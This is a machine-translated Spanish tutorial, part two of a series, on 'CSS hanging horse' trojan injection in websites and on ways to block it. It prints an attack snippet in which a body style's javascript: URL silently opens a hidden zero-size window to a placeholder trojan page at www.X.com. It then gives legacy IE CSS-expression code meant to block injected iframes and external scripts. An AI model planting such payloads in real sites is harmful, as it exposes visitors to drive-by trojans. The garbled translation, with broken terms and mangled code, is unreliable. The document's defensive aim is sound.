Tutorial de seguridad: Comprensión de CSS Hanging Horse y métodos de prevención (2)

Xiaokeke: Al usar el elemento del objeto Body, principalmente para hacer que el objeto ya no cambie el contenido de todo el documento web, a través del control del objeto Body, puede poner el contenido o el efecto Los controles están dentro del tamaño especificado, con la misma precisión con que se utiliza el objeto DIV.

Modo 2:

Cuerpo {

background-image: url (javascript: abierto ('http://www.X.com/muma.htm', ' Newwindow ',' altura = 0, ancho = 0, arriba = 1000, izquierda = 0, barra de herramientas = no, barra de menú = no, barras de desplazamiento = no, tamaño variable = no, ubicación = no, estado = no '))

}

La tecnología CSS horse horse del modo 1 tendrá una página en blanco en tiempo de ejecución, que afecta el acceso normal de los visitantes a la web, por lo que es más fácil de encontrar. Sin embargo, en el código en el modo 2, usando la ventana Abrir de JavaScript, abriendo una ventana oculta, ejecutando silenciosamente una nueva ventana en segundo plano y activando el desbordamiento de la página web, la página del troyano no afecta la visualización del contenido del sitio web por parte del visitante. Por eso está más oculto.

El servidor anti-red está colgado y generalmente tiene alertas de software antivirus. Debido a la actualización continua de las vulnerabilidades, los tipos de caballos colgantes están cambiando en todo momento. El cliente a menudo pasa por alto si el servidor está bloqueado. El enfoque correcto es verificar los registros del servidor con frecuencia, encontrar información anormal, verificar el código del sitio web con frecuencia y usar el sistema de detección de troyanos web para verificar.

Además de usar la ventana emergente de bloqueo anterior para evitar que CSS cuelgue caballos, también puede configurar el filtrado de CSS en la página web para filtrar el CSS. Sin embargo, si elige filtrar CSS, primero debe prestar atención a si su página web relacionada tiene contenido CSS, por lo que aún utilizamos el método de bloqueo para evitar CSS. El código de bloqueo es el siguiente:

iframe {miao1: expresión (this.src = 'about: blank', this.outerHTML = '');}

script {miao2: expresión ( Si (this.src.indexOf ('http') == 0) this.src = 'res: //ieframe.dll/dnserror.htm');}

El src del código troyano del dominio extranjero es pesado Escriba la dirección de la página de error IE404, para que no se descargue el código JavaScript del dominio extranjero. Sin embargo, el método de bloqueo también tiene una debilidad fatal natural, y el secreto de la debilidad se anunciará la próxima vez.